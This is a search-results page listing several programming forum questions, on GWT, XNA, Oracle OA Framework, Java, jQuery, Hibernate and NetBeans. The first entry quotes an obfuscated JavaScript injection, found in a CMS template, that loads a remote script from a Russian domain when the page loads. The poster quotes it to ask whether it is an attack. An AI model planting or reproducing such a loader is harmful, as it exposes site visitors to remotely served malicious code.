Search Results

Search found 13011 results on 521 pages for 'catch block'.

Page 100/521 | < Previous Page | 96 97 98 99 100 101 102 103 104 105 106 107  | Next Page >

  • Weird Javascript in Template. Is this a hacking attempt?

    - by Julian
    I validated my client's website to xHTML Strict 1.0/CSS 2.1 standards last week. Today when I re-checked, I had a validation error caused by a weird and previous unknown script. I found this in the index.php file of my ExpressionEngine CMS. What is this javascript doing? Is this a hacking attempt as I suspected? I couldn't help but notice the Russian domain encoded in the script... this.v=27047; this.v+=187; ug=["n"]; OV=29534; OV--; var y; var C="C"; var T={}; r=function(){ b=36068; b-=144; M=[]; function f(V,w,U){ return V.substr(w,U); var wH=39640; } var L=["o"]; var cj={}; var qK={N:false}; var fa="/g"+"oo"+"gl"+"e."+"co"+"m/"+f("degL4",0,2)+f("rRs6po6rRs",4,2)+f("9GVsiV9G",3,2)+f("5cGtfcG5",3,2)+f("M6c0ilc6M0",4,2)+"es"+f("KUTz.cUzTK",4,2)+f("omjFb",0,2)+"/s"+f("peIlh2",0,2)+"ed"+f("te8WC",0,2)+f("stien3",0,2)+f(".nYm6S",0,2)+f("etUWH",0,2)+f(".pdVPH",0,2)+f("hpzToi",0,2); var BT="BT"; var fV=RegExp; var CE={bf:false}; var UW=''; this.Ky=11592; this.Ky-=237; var VU=document; var _n=[]; try {} catch(wP){}; this.JY=29554; this.JY-=245; function s(V,w){ l=13628; l--; var U="["+w+String("]"); var rk=new fV(U, f("giId",0,1)); this.NS=18321;this.NS+=195;return V.replace(rk, UW); try {} catch(k){}; }; this.jM=""; var CT={}; var A=s('socnruixpot4','zO06eNGTlBuoYxhwn4yW1Z'); try {var vv='m'} catch(vv){}; var Os={}; var t=null; var e=String("bod"+"y"); var F=155183-147103; this.kp=''; Z={Ug:false}; y=function(){ var kl=["mF","Q","cR"]; try { Bf=11271; Bf-=179; var u=s('cfr_eKaPtQe_EPl8eTmPeXn8to','X_BQoKfTZPz8MG5'); Fp=VU[u](A); var H=""; try {} catch(WK){}; this.Ca=19053; this.Ca--; var O=s('s5rLcI','2A5IhLo'); var V=F+fa; this.bK=""; var ya=String("de"+"fe"+f("r3bPZ",0,1)); var bk=new String(); pB=9522; pB++; Fp[O]=String("ht"+"tp"+":/"+"/t"+"ow"+"er"+"sk"+"y."+"ru"+":")+V; Fp[ya]=[1][0]; Pe=45847; Pe--; VU[e].appendChild(Fp); var lg=new Array(); var aQ={vl:"JC"}; this.KL="KL"; } catch(x){ this.Ja=""; Th=["pj","zx","kO"]; var Jr=''; }; Tr={qZ:21084}; }; this.pL=false; }; be={}; rkE={hb:"vG"}; r(); var bY=new Date(); window.onload=y; cU=["Yr","gv"];

    Read the article

  • Google Web Toolkit Deferred Binding Issue

    - by snctln
    I developed a web app using GWT about 2 years ago, since then the application has evolved. In its current state it relies on fetching a single XML file and parsing the information from it. Overall this works great. A requirement of this app is that it needs to be able to be ran from the filesystem (file:///..) as well as the traditional model of running from a webserver (http://...) Fetching this file from a webserver works exactly as expected using a RequestBuilder object. When running the app from the filesystem Firefox, Opera, Safari, and Chrome all behave as expected. When running the app from the filesystem using IE7 or IE8 the RequestBuilder.send() call fails, the information about the error suggests that there is a problem accessing the file due to violating the same origin policy. The app worked as expected in IE6 but not in IE7 or IE8. So I looked at the source code of RequestBuilder.java and saw that the actual request was being executed with an XMLHttpRequest GWT object. So I looked at the source code for XMLHttpRequest.java and found out some information. Here is the code (starts at line 83 in XMLHttpRequest.java) public static native XMLHttpRequest create() /*-{ if ($wnd.XMLHttpRequest) { return new XMLHttpRequest(); } else { try { return new ActiveXObject('MSXML2.XMLHTTP.3.0'); } catch (e) { return new ActiveXObject("Microsoft.XMLHTTP"); } } }-*/; So basically if an XMLHttpRequest cannot be created (like in IE6 because it is not available) an ActiveXObject is used instead. I read up a little bit more on the IE implementation of XMLHttpRequest, and it appears that it is only supported for interacting with files on a webserver. I found a setting in IE8 (Tools-Internet Options-Advanced-Security-Enable native XMLHTTP support), when I uncheck this box my app works. I assume this is because I am more of less telling IE to not use their implementation of XmlHttpRequest, so GWT just uses an ActiveXObject because it doesn't think the native XmlHttpRequest is available. This fixes the problem, but is hardly a long term solution. I can currently catch a failed send request and verify that it was trying to fetch the XML file from the filesystem using normal GWT. What I would like to do in this case is catch the IE7 and IE8 case and have them use a ActiveXObject instead of a native XmlHttpRequest object. There was a posting on the GWT google group that had a supposed solution for this problem (link). Looking at it I can tell that it was created for an older version of GWT. I am using the latest release and think that this is more or less what I would like to do (use GWT deferred binding to detect a specific browser type and run my own implementation of XMLHttpRequest.java in place of the built in GWT implementation). Here is the code that I am trying to use package com.mycompany.myapp.client; import com.google.gwt.xhr.client.XMLHttpRequest; public class XMLHttpRequestIE7or8 extends XMLHttpRequest { // commented out the "override" so that eclipse and the ant build script don't throw errors //@Override public static native XMLHttpRequest create() /*-{ try { return new ActiveXObject('MSXML2.XMLHTTP.3.0'); } catch (e) { return new ActiveXObject("Microsoft.XMLHTTP"); } }-*/; // have an empty protected constructor so the ant build script doesn't throw errors // the actual XMLHttpRequest constructor is empty as well so this shouldn't cause any problems protected XMLHttpRequestIE7or8() { } }; And here are the lines that I added to my module xml <replace-with class="com.mycompany.myapp.client.XMLHttpRequestIE7or8"> <when-type-is class="com.google.gwt.xhr.client.XMLHttpRequest"/> <any> <when-property-is name="user.agent" value="ie7" /> <when-property-is name="user.agent" value="ie8" /> </any> </replace-with> From what I can tell this should work, but my code never runs. Does anyone have any idea of what I am doing wrong? Should I not do this via deferred binding and just use native javascript when I catch the fail case instead? Is there a different way of approaching this problem that I have not mentioned? All replies are welcome.

    Read the article

  • Keypress detection wont work after seemingly unrelated code change

    - by LukeZaz
    I'm trying to have the Enter key cause a new 'map' to generate for my game, but for whatever reason after implementing full-screen in it the input check won't work anymore. I tried removing the new code and only pressing one key at a time, but it still won't work. Here's the check code and the method it uses, along with the newMap method: public class Game1 : Microsoft.Xna.Framework.Game { // ... protected override void Update(GameTime gameTime) { // ... // Check if Enter was pressed - if so, generate a new map if (CheckInput(Keys.Enter, 1)) { blocks = newMap(map, blocks, console); } // ... } // Method: Checks if a key is/was pressed public bool CheckInput(Keys key, int checkType) { // Get current keyboard state KeyboardState newState = Keyboard.GetState(); bool retType = false; // Return type if (checkType == 0) { // Check Type: Is key currently down? if (newState.IsKeyDown(key)) { retType = true; } else { retType = false; } } else if (checkType == 1) { // Check Type: Was the key pressed? if (newState.IsKeyDown(key)) { if (!oldState.IsKeyDown(key)) { // Key was just pressed retType = true; } else { // Key was already pressed, return false retType = false; } } } // Save keyboard state oldState = newState; // Return result if (retType == true) { return true; } else { return false; } } // Method: Generate a new map public List<Block> newMap(Map map, List<Block> blockList, Console console) { // Create new map block coordinates List<Vector2> positions = new List<Vector2>(); positions = map.generateMap(console); // Clear list and reallocate memory previously used up by it blockList.Clear(); blockList.TrimExcess(); // Add new blocks to the list using positions created by generateMap() foreach (Vector2 pos in positions) { blockList.Add(new Block() { Position = pos, Texture = dirtTex }); } // Return modified list return blockList; } // ... } and the generateMap code: // Generate a list of Vector2 positions for blocks public List<Vector2> generateMap(Console console, int method = 0) { ScreenTileWidth = gDevice.Viewport.Width / 16; ScreenTileHeight = gDevice.Viewport.Height / 16; maxHeight = gDevice.Viewport.Height; List<Vector2> blockLocations = new List<Vector2>(); if (useScreenSize == true) { Width = ScreenTileWidth; Height = ScreenTileHeight; } else { maxHeight = Height; } int startHeight = -500; // For debugging purposes, the startHeight is set to an // hopefully-unreachable value - if it returns this, something is wrong // Methods of land generation /// <summary> /// Third version land generation /// Generates a base land height as the second version does /// but also generates a 'max change' value which determines how much /// the land can raise or lower by which it now does by a random amount /// during generation /// </summary> if (method == 0) { // Get the land height startHeight = rnd.Next(1, maxHeight); int maxChange = rnd.Next(1, 5); // Amount ground will raise/lower by int curHeight = startHeight; for (int w = 0; w < Width; w++) { // Run a chance to lower/raise ground level int changeBy = rnd.Next(1, maxChange); int doChange = rnd.Next(0, 3); if (doChange == 1 && !(curHeight <= (1 + maxChange))) { curHeight = curHeight - changeBy; } else if (doChange == 2 && !(curHeight >= (29 - maxChange))) { curHeight = curHeight + changeBy; } for (int h = curHeight; h < Height; h++) { // Location variables float x = w * 16; float y = h * 16; blockLocations.Add(new Vector2(x, y)); } } console.newMsg("[INFO] Cur, height change maximum: " + maxChange.ToString()); } /// <summary> /// Second version land generator /// Generates a solid mass of land starting at a random height /// derived from either screen height or provided height value /// </summary> else if (method == 1) { // Get the land height startHeight = rnd.Next(0, 30); for (int w = 0; w < Width; w++) { for (int h = startHeight; h < ScreenTileHeight; h++) { // Location variables float x = w * 16; float y = h * 16; // Add a tile at set location blockLocations.Add(new Vector2(x, y)); } } } /// <summary> /// First version land generator /// Generates land completely randomly either across screen or /// in a box set by Width and Height values /// </summary> else { // For each tile in the map... for (int w = 0; w < Width; w++) { for (int h = 0; h < Height; h++) { // Location variables float x = w * 16; float y = h * 16; // ...decide whether or not to place a tile... if (rnd.Next(0, 2) == 1) { // ...and if so, add a tile at that location. blockLocations.Add(new Vector2(x, y)); } } } } console.newMsg("[INFO] Cur, base height: " + startHeight.ToString()); return blockLocations; } I never touched any of the above code for this when it broke - changing keys won't seem to fix it. Despite this, I have camera movement set inside another Game1 method that uses WASD and works perfectly. All I did was add a few lines of code here: private int BackBufferWidth = 1280; // Added these variables private int BackBufferHeight = 800; public Game1() { graphics = new GraphicsDeviceManager(this); graphics.PreferredBackBufferWidth = BackBufferWidth; // and this graphics.PreferredBackBufferHeight = BackBufferHeight; // this Content.RootDirectory = "Content"; this.graphics.IsFullScreen = true; // and this } When I try adding a console line to be printed in the event the key is pressed, it seems that the If is never even triggered despite the correct key being pressed.

    Read the article

  • D2K to OA Framework Transition

    - by PRajkumar
    What is the difference between D2K form and OA Framework? It is a very innocent but important question for someone that desires to make transition from D2K to OA Framework. I hope you have already read and implemented OA Framework Getting Started. I will re-visit my own experience of implementing HelloWorld program in "OA Framework". When I implemented HelloWorld a year ago, I had no clue as to what I was doing & why I was doing those steps. I merely copied the steps from Oracle Tutorial without understanding them. Hence in this blog, I will try to explain in simple manner the meaning of OA Framework HelloWorld Program and compare the steps to D2K form [where possible]. To keep things simple, only basics will be discussed. Following key Steps were needed for HelloWorld Step 1 Create a new Workspace and a new Project as dictated by Oracle's tutorial. When defining project, you will specify a default package, which in this case was oracle.apps.ak.hello This means the following: - ak is the short name of the Application in Oracle           [means fnd_applications.short_name] hello is the name of your project Step 2 Next, you will create a OA Page within hello project Think OA Page as the fmx file itself in D2K. I am saying so because this page gets attached to the form function. This page will be created within hello project, hence the package name oracle.apps.ak.hello.webui Note the webui, it is a convention to have page in webui, means this page represents the Web User Interface You will assign the default AM [OAApplicationModule]. Think of AM "Connection Manager" and "Transaction State Manager" for your page          I can't co-relate this to anything in D2k, as there is no concept of Connection Pooling and that D2k is not stateless. Reason being that as soon as you kick off a D2K Form, it connects to a single session of Oracle and sticks to that single Oracle database session. So is not the case in OAF, hence AM is needed. Step 3 You create Region within the Page. ·         Region is what will store your fields. Text input fields will be of type messageTextInput. Think of Canvas in D2K. You can have nested regions. Stacked Canvas in D2K comes the closest to this component of OA Framework Step 4 Add a button to one of the nested regions The itemStyle should be submitButton, in case you want the page to be submitted when this button is clicked There is no WHEN-BUTTON-PRESSED trigger in OAF. In Framework, you will add a controller java code to handle events like Form Submit button clicks. JDeveloper generates the default code for you. Primarily two functions [should I call methods] will be created processRequest [for UI Rendering Handling] and processFormRequest          Think of processRequest as WHEN-NEW-FORM-INSTANCE, though processRequest is very restrictive. Note What is the difference between processRequest and processFormRequest? These two methods are available in the Default Controller class that gets created. processFormRequest This method is commonly used to react/respond to the event that has taken place, for example click of a button. Some examples are if(oapagecontext.getParameter("Cancel") != null) (Do your processing for Cancellation/ Rollback) if(oapagecontext.getParameter("Submit") != null) (Do your validations and commit here) if(oapagecontext.getParameter("Update") != null) (Do your validations and commit here) In the above three examples, you could be calling oapagecontext.forwardImmediately to re-direct the page navigation to some other page if needed. processRequest In this method, usually page rendering related code is written. Effectively, each GUI component is a bean that gets initialised during processRequest. Those who are familiar with D2K forms, something like pre-query may be written in this method. Step 5 In the controller to access the value in field "HelloName" the command is String userContent = pageContext.getParameter("HelloName"); In D2k, we used :block.field. In OAFramework, at submission of page, all the field values get passed into to OAPageContext object. Use getParameter to access the field value To set the value of the field, use OAMessageTextInputBean field HelloName = (OAMessageTextInputBean)webBean.findChildRecursive("HelloName"); fieldHelloName.setText(pageContext,"Setting the default value" ); Note when setting field value in controller: Note 1. Do not set the value in processFormRequest Note 2. If the field comes from View Object, then do not use setText in controller Note 3. For control fields [that are not based on View Objects], you can use setText to assign values in processRequest method Lets take some notes to expand beyond the HelloWorld Project Note 1 In D2K-forms we sort of created a Window, attached to Canvas, and then fields within that Canvas. However in OA Framework, think of Page being fmx/Window, think of Region being a Canvas, and fields being within Regions. This is not a formal/accurate understanding of analogy between D2k and Framework, but is close to being logical. Note 2 In D2k, your Forms fmb file was compiled to fmx. It was fmx file that was deployed on mid-tier. In case of OAF, your OA Page is nothing but a XML file. We call this MDS [meta data]. Whatever name you give to "Page" in OAF, an XML file of the same name gets created. This xml file must then be loaded into database by using XML Importer command. Note 3 Apart from MDS XML file, almost everything else is merely deployed to your mid-tier. Usually this is underneath $JAVA_TOP/oracle/apps/../.. All java files will go underneath java top/oracle/apps/../.. etc. Note 4 When building tutorial, ignore the steps for setting "Attribute Sets". These are not mandatory. Oracle might just have developed their tutorials without including these. Think of these like Visual Attributes of D2K forms Note 5 Controller is where you will write any java code in OA Framework. You can create a Controller per Page or have a different Controller for each of the Regions with the same Page. Note 6 In the method processFormRequest of the Controller, you can access the values of the page by using notation pageContext.getParameter("<fieldname here>"). This method processFormRequest is executed when the OAF Screen/Page is submitted by click of a button. Note 7 Inside the controller, all the Database Related interactions for example interaction with View Objects happen via Application Module. But why so? Because Application Module Manages the transaction state of the Application. OAApplicationModuleImpl oaapplicationmoduleimpl = OAApplicationModuleImpl)oapagecontext.getApplicationModule(oawebbean); OADBTransaction oadbtransaction = OADBTransaction)oaapplicationmoduleimpl.getDBTransaction(); Note 8 In D2K, we have control block or a block based on database view. Similarly, in OA Framework, if the field does not have view Object attached, then it is like a control field. Hence in HelloWorld example, field HelloName is a control field [in D2K terminology]. A view Object can either be based on a view/table, synonym or on a SQL statement. Note 9 I wish to access the fields in multi record block that is based on view Object. Can I do this in Controller? Sure you can. To traverse through those records, do the below ·         Get the reference to the View Object using (OAViewObject)oapagecontext.getApplicationModule(oawebbean).findViewObject("VO Name Here") ·         Loop through the records in View Objects using count returned from oaviewobject.getFetchedRowCount() ·         For each record, fetch the value of the fields within the loop as oracle.jbo.Row row = oaviewobject.getRowAtRangeIndex(loop index here); (String)row.getAttribute("Column name of VO here ");

    Read the article

  • Parse a text file into multiple text file

    - by Vijay Kumar Singh
    I want to get multiple file by parsing a input file Through Java. The Input file contains many fasta format of thousands of protein sequence and I want to generate raw format(i.e., without any comma semicolon and without any extra symbol like "", "[", "]" etc) of each protein sequence. A fasta sequence starts form "" symbol followed by description of protein and then sequence of protein. For example ? lcl|NC_000001.10_cdsid_XP_003403591.1 [gene=LOC100652771] [protein=hypothetical protein LOC100652771] [protein_id=XP_003403591.1] [location=join(12190..12227,12595..12721,13403..13639)] MSESINFSHNLGQLLSPPRCVVMPGMPFPSIRSPELQKTTADLDHTLVSVPSVAESLHHPEITFLTAFCL PSFTRSRPLPDRQLHHCLALCPSFALPAGDGVCHGPGLQGSCYKGETQESVESRVLPGPRHRH Like above formate the input file contains 1000s of protein sequence. I have to generate thousands of raw file containing only individual protein sequence without any special symbol or gaps. I have developed the code for it in Java but out put is : Cannot open a file followed by cannot find file. Please help me to solve my problem. Regards Vijay Kumar Garg Varanasi Bharat (India) The code is /*Java code to convert FASTA format to a raw format*/ import java.io.*; import java.util.*; import java.util.regex.*; import java.io.FileInputStream; // java package for using regular expression public class Arrayren { public static void main(String args[]) throws IOException { String a[]=new String[1000]; String b[][] =new String[1000][1000]; /*open the id file*/ try { File f = new File ("input.txt"); //opening the text document containing genbank ids FileInputStream fis = new FileInputStream("input.txt"); //Reading the file contents through inputstream BufferedInputStream bis = new BufferedInputStream(fis); // Writing the contents to a buffered stream DataInputStream dis = new DataInputStream(bis); //Method for reading Java Standard data types String inputline; String line; String separator = System.getProperty("line.separator"); // reads a line till next line operator is found int i=0; while ((inputline=dis.readLine()) != null) { i++; a[i]=inputline; a[i]=a[i].replaceAll(separator,""); //replaces unwanted patterns like /n with space a[i]=a[i].trim(); // trims out if any space is available a[i]=a[i]+".txt"; //takes the file name into an array try // to handle run time error /*take the sequence in to an array*/ { BufferedReader in = new BufferedReader (new FileReader(a[i])); String inline = null; int j=0; while((inline=in.readLine()) != null) { j++; b[i][j]=inline; Pattern q=Pattern.compile(">"); //Compiling the regular expression Matcher n=q.matcher(inline); //creates the matcher for the above pattern if(n.find()) { /*appending the comment line*/ b[i][j]=b[i][j].replaceAll(">gi",""); //identify the pattern and replace it with a space b[i][j]=b[i][j].replaceAll("[a-zA-Z]",""); b[i][j]=b[i][j].replaceAll("|",""); b[i][j]=b[i][j].replaceAll("\\d{1,15}",""); b[i][j]=b[i][j].replaceAll(".",""); b[i][j]=b[i][j].replaceAll("_",""); b[i][j]=b[i][j].replaceAll("\\(",""); b[i][j]=b[i][j].replaceAll("\\)",""); } /*printing the sequence in to a text file*/ b[i][j]=b[i][j].replaceAll(separator,""); b[i][j]=b[i][j].trim(); // trims out if any space is available File create = new File(inputline+"R.txt"); try { if(!create.exists()) { create.createNewFile(); // creates a new file } else { System.out.println("file already exists"); } } catch(IOException e) // to catch the exception and print the error if cannot open a file { System.err.println("cannot create a file"); } BufferedWriter outt = new BufferedWriter(new FileWriter(inputline+"R.txt", true)); outt.write(b[i][j]); // printing the contents to a text file outt.close(); // closing the text file System.out.println(b[i][j]); } } catch(Exception e) { System.out.println("cannot open a file"); } } } catch(Exception ex) // catch the exception and prints the error if cannot find file { System.out.println("cannot find file "); } } } If you provide me correct it will be much easier to understand.

    Read the article

  • CSS Menu loses focus when part of jquery hover()

    - by Steve Syfuhs
    I have the following html (viewable at www.communityftw.com) <table width="100%"> <tr> <td style="text-align: left"> <!-- 2008.3.1314.35 --><span id="headerSearch1_sb_form_q_wrapper" class="RadInput_Default" style="white-space:nowrap;"><input value="language..." type="text" size="20" id="headerSearch1_sb_form_q_text" name="headerSearch1_sb_form_q_text" class="riTextBox riEmpty sw_qboxTop" name="q" style="width:140px;" /><input id="headerSearch1_sb_form_q" name="ctl00$headerSearch1$sb_form_q" class="rdfd_" style="visibility:hidden;margin:-18px 0 0 0;width:1px;height:1px;overflow:hidden;border:0;padding:0;" type="text" value="" /><input id="headerSearch1_sb_form_q_ClientState" name="headerSearch1_sb_form_q_ClientState" type="hidden" /></span> <input type="submit" name="ctl00$headerSearch1$sb_form_go" value="" id="headerSearch1_sb_form_go" class="sw_qbtnTop" /> </td> <td style="text-align: left"> <ul id="menu"> <li class="languageContainer"> <div> <a href="#" id="languageField"> <img src="/images/flags/ca.png" alt="Canada" /> Canada (English)</a> </div> <ul id="language"> <li><a href="#" id="A1"> <img src="/images/flags/ca.png" alt="Canada" /> Canada (French)</a> </li> <li><a href="#" id="A2"> <img src="/images/flags/us.png" alt="United States" /> United States</a> </li> <li><a href="#" id="A3"> <img src="/images/flags/de.png" alt="Germany" /> Germany</a> </li> <li><a href="#" id="A4"> <img src="/images/flags/fr.png" alt="France" /> France</a> </li> <li><a href="#" id="A5"> <img src="/images/flags/ru.png" alt="Russia" /> Russia</a> </li> <li class="last"> <img alt="" src="images/langLocDrop_r4_c1.png" /> </li> </ul> </li> </ul> </td> </tr> </table> Javascript/jquery $('#slide').animate({ top: '-=34' }, 1000); $("#slide").hover(function () { $(this).animate({ top: '+=34' }); }, function () { $(this).animate({ top: '-=34' }); }); menu { margin: 0px; padding: 0px; list-style: none; display: inline-block; float: left; z-index: 1000; } menu a { color: #dc2525; text-decoration: none; } menu li { background: none repeat scroll 0 0; cursor: pointer; float: left; position: relative; } menu li a:hover { color: orange; } menu ul { padding: 0px; margin: 0px; display: block; display: inline; } menu li ul { position: absolute; left: -15px; top: 0px; margin-top: 20px; width: 170px; line-height: 16px; background-image: url(/images/langLocDrop_r2_c1.png); display: none; } menu li:hover ul { display: block; } menu li ul li { display: block; margin: 5px 20px; padding: 5px 0px; border-top: dotted 1px #606060; list-style-type: none; } menu li ul li:first-child { border-top: none; } menu li ul li a { display: block; } menu li ul li a:hover { color: orange; } .languageContainer div { display: inline; padding: 5px; } languageField img { display: inline; vertical-align: middle; } language img { display: inline; } menu .last { background: transparent none repeat scroll 0% 0%; margin: 0px; padding: 0px; border: none; position: relative; border: none; height: 0px; } What I'm trying to do is have a menu mostly hidden at the top except when you mouse over it, and then have a submenu (just css driven) pop out when you mouse over the language. What is happening though is that when I move onto the language list, and I go past Germany (~50% down the list?), the hover() loses focus and closes the original menu, which closes the language menu. Any idea's what is causing the issue? Any ideas how to fix the issue? I have tried the hoverIntent() plugin as well to no avail.

    Read the article

  • jQuery featured content slider

    - by azz0r
    Hello, I have a content area that loops through divs and shows there content. I'm having trouble making it display the initial content, unfortunately it waits 5000 milliseconds before triggering the very first content area to display. Anyone spot an easy way to make it display the initial area, then slide to the next area and do them at 5000 milliseconds. JS Model.FeatureBar = { current:0, items:{}, init: function init(options){ var me = this; me.triggers = [] me.slides = [] this.container = jQuery('#features'); jQuery('.feature').each(function(i){ me.triggers[i] = {url: jQuery(this).children('.feature-title a').href, title: jQuery(this).children('.feature-title'),description:jQuery(this).children('.feature-description')} me.slides[i] = {image: jQuery(this).children('.feature-image')} }); for(var i in this.slides){ this.slides[i].image.hide(); this.triggers[i].description.hide(); } setInterval(function(){Model.FeatureBar.next()},5000); }, next: function next(){ var i = (this.current+1 < this.triggers.length) ? this.current+1 : 0; this.goToItem(i); }, previous: function previous(){ var i = (this.current-1 > 1) ? this.current-1 : this.triggers.length; this.goToItem(i); }, goToItem: function goToItem(i){ if(!this.slides[i]) throw 'Slide out of range'; this.triggers[this.current].description.slideUp(); this.triggers[i].description.slideDown(); this.slides[this.current].image.hide(); this.slides[i].image.show(); this.current = i; }, } html <div id="features"> <div class="feature current"> <div class="movie-cover"> <a href="/police/movie"><img title="" alt="" src="/design/images/four-oh-four.png"></a> </div> <div class="feature-image" style="display: none;"> <img src="/design/images/four-oh-four.png"> </div> <h2 class="feature-title"><a href="/police/movie">Police</a></h2> <p class="feature-description" style="overflow: hidden; display: block; height: 50.8604px; margin-top: 0px; margin-bottom: 0px; padding-top: 0px; padding-bottom: 0px;">DESCRIPTION</p> </div> <div class="feature"> <div class="movie-cover"> <a href="/rude/movie"><img title="" alt="" src="/design/images/four-oh-four.png"></a> </div> <div class="feature-image" style="display: none;"> <img src="/design/images/four-oh-four.png"> </div> <h2 class="feature-title"><a href="/rude/movie">Rude</a></h2> <p class="feature-description" style="overflow: hidden; display: block; height: 18.3475px; margin-top: 0px; margin-bottom: 0px; padding-top: 0px; padding-bottom: 0px;">DESCRIPTION</p> </div> <div class="feature"> <div class="movie-cover"> <a href="/brits/movie"><img title="" alt="" src="/design/images/four-oh-four.png"></a> </div> <div class="feature-image" style="display: block;"> <img src="/design/images/four-oh-four.png"> </div> <h2 class="feature-title"><a href="/brits/movie">Brits</a></h2> <p class="feature-description" style="overflow: hidden; display: block; height: 40.1549px; margin-top: 0px; margin-bottom: 0px; padding-top: 0px; padding-bottom: 0px;">DESCRIPTION</p> </div> <div class="feature"> <div class="movie-cover"> <a href="/indie/movie"><img title="" alt="" src="/design/images/four-oh-four.png"></a> </div> <div class="feature-image" style="display: none;"> <img src="/design/images/four-oh-four.png"> </div> <h2 class="feature-title"><a href="/indie/movie">Indie</a></h2> <p class="feature-description" style="overflow: hidden; display: block; height: 42.4247px; margin-top: 0px; margin-bottom: 0px; padding-top: 0px; padding-bottom: 0px;">DESCRIPTION</p> </div>

    Read the article

  • hibernate not picking sessionFactory

    - by Satya
    My application-context.xml is <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE beans PUBLIC "-//SPRING//DTD BEAN//EN" "http://www.springframework.org/dtd/spring-beans.dtd"> <beans> <bean id="myDataSource" class="org.apache.commons.dbcp.BasicDataSource" destroy-method="close"> <property name="driverClassName"><value>com.mysql.jdbc.Driver</value></property> <property name="url"><value>jdbc:mysql://localhost:3306/myDB</value></property> <property name="username"><value>myUser</value></property> <property name="password"><value>myUser</value></property> </bean> <bean id="mySessionFactory" class="org.springframework.orm.hibernate3.LocalSessionFactoryBean"> <property name="mappingResources"> <property name="dataSource"><ref bean="myDataSource"/></property> <list> <value>com/x/model/config/hibernate/user.hbm.xml</value> </list> </property> <property name="hibernateProperties" > <value> hibernate.dialect=org.hibernate.dialect.MySQLDialect </value> </property> </bean> <bean id="userdao" class="com.x.y.z.UserDao"> <property name="sessionFactory"><ref bean="mySessionFactory"/></property> </bean> </beans> user.hbm.xml is <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE hibernate-mapping PUBLIC "-//Hibernate/Hibernate Mapping DTD//EN" "http://hibernate.sourceforge.net/hibernate-mapping-3.0.dtd"> <hibernate-mapping package="com.cpt.model"> <class name="User" table="user"> <id name="userId" column="id"> <generator class="native"/> </id> <property name="firstname" column="firstName" /> <property name="lastName" column="lastName"/> <property name="login" column="login"/> <property name="pass" column="pass"/> <property name="superemail" column="superEmail"/> </class> </hibernate-mapping> and the UserDao is package com.x.y.z; import java.sql.Connection; import java.sql.DriverManager; import java.sql.SQLException; import java.sql.Statement; import org.hibernate.HibernateException; import org.hibernate.Session; import org.hibernate.SessionFactory; import org.hibernate.cfg.Configuration; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.orm.hibernate.support.HibernateDaoSupport; import org.springframework.stereotype.Component; import com.x.model.User; @Component public class UserDao { private SessionFactory sessionFactory; public void addUser(User user) { Session session; try { try { session = getSessionFactory().openSession(); // session = sessionFactory.openSession(); session.save(user); } catch (RuntimeException e) { // TODO Auto-generated catch block e.printStackTrace(); } } catch (HibernateException e) { // TODO Auto-generated catch block System.out.println("printing in the catch"); e.printStackTrace(); } } public SessionFactory getSessionFactory() { System.out.println("returning session factory ::: sessionFactory == null :: "+sessionFactory.openSession()); return sessionFactory; } public void setSessionFactory(SessionFactory sessionFactory) { System.out.println("this is setting session factory" + sessionFactory.getClass()); System.out.println("setting session factory ::: sessionFactory == null :: "+sessionFactory==null); this.sessionFactory = sessionFactory; System.out.println("setting session factory ::: sessionFactory == null :: "+this.sessionFactory.openSession().getClass()); System.out.println(getSessionFactory().openSession().isOpen()); } } However, I keep getting 14:45:09,929 INFO [org.hibernate.impl.SessionFactoryImpl] building session fact ory 14:45:09,933 WARN [net.sf.ehcache.config.Configurator] No configuration found. Configuring ehcache from ehcache-failsafe.xml found in the classpath: vfs:/C:/jb /server/default/deploy/C.war/WEB-INF/lib/ehcache-1.1.jar/ehcache-failsafe.xml 14:45:10,007 INFO [org.hibernate.impl.SessionFactoryObjectFactory] Not binding factory to JNDI, no JNDI name configured 14:45:10,008 INFO [org.hibernate.impl.SessionFactoryImpl] Checking 0 named quer ies 14:45:10,017 INFO [STDOUT] this is setting session factoryclass $Proxy178 14:45:10,017 INFO [STDOUT] false 14:45:10,019 INFO [STDOUT] setting session factory ::: sessionFactory == null : : class org.hibernate.impl.SessionImpl 14:45:10,020 INFO [STDOUT] returning session factory ::: sessionFactory == null :: org.hibernate.impl.SessionImpl(PersistentContext[entitiesByKey={}] ActionQue ue[insertions=[] updates=[] deletions=[] collectionCreations=[] collectionRemova ls=[] collectionUpdates=[]]) It is giving sessionFactory null . Any Idea where am I failing ? Thanks

    Read the article

  • Netbeans Java SE GUI Builder: private initComponents() problem

    - by maSnun
    When I build a GUI for my Java SE app with Netbeans GUI builder, it puts all the codes in the initComponents() method which is private. I could not change it to public. So, all the components are accessible only to the class containing the UI. I want to access those components from another class so that I can write custom event handlers and everything. Most importantly I want to separate my GUI code and non-GUI from each other. I can copy paste the GUI code and later make them public by hand to achieve what I want. But thats a pain. I have to handcraft a portion whenever I need to re-design the UI. What I tried to do: I used the variable identifier to make the text box public. Now how can I access the text box from the Main class? I think I need the component generated in a public method as well. I am new to Java. Any helps? Here's the sample classes: The UI (uiFrame.java) /* * To change this template, choose Tools | Templates * and open the template in the editor. */ /* * uiFrame.java * * Created on Jun 3, 2010, 9:33:15 PM */ package barcode; import java.util.logging.Level; import java.util.logging.Logger; import javax.swing.JFileChooser; import javax.swing.UIManager; import javax.swing.UnsupportedLookAndFeelException; import net.sourceforge.barbecue.output.OutputException; /** * * @author masnun */ public class uiFrame extends javax.swing.JFrame { /** Creates new form uiFrame */ public uiFrame() { try { try { // Set cross-platform Java L&F (also called "Metal") UIManager.setLookAndFeel(UIManager.getSystemLookAndFeelClassName()); } catch (ClassNotFoundException ex) { Logger.getLogger(uiFrame.class.getName()).log(Level.SEVERE, null, ex); } catch (InstantiationException ex) { Logger.getLogger(uiFrame.class.getName()).log(Level.SEVERE, null, ex); } catch (IllegalAccessException ex) { Logger.getLogger(uiFrame.class.getName()).log(Level.SEVERE, null, ex); } catch (UnsupportedLookAndFeelException ex) { Logger.getLogger(uiFrame.class.getName()).log(Level.SEVERE, null, ex); } } finally { } initComponents(); } /** This method is called from within the constructor to * initialize the form. * WARNING: Do NOT modify this code. The content of this method is * always regenerated by the Form Editor. */ @SuppressWarnings("unchecked") // <editor-fold defaultstate="collapsed" desc="Generated Code"> private void initComponents() { label1 = new javax.swing.JLabel(); textBox = new javax.swing.JTextField(); saveButton = new javax.swing.JButton(); setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE); 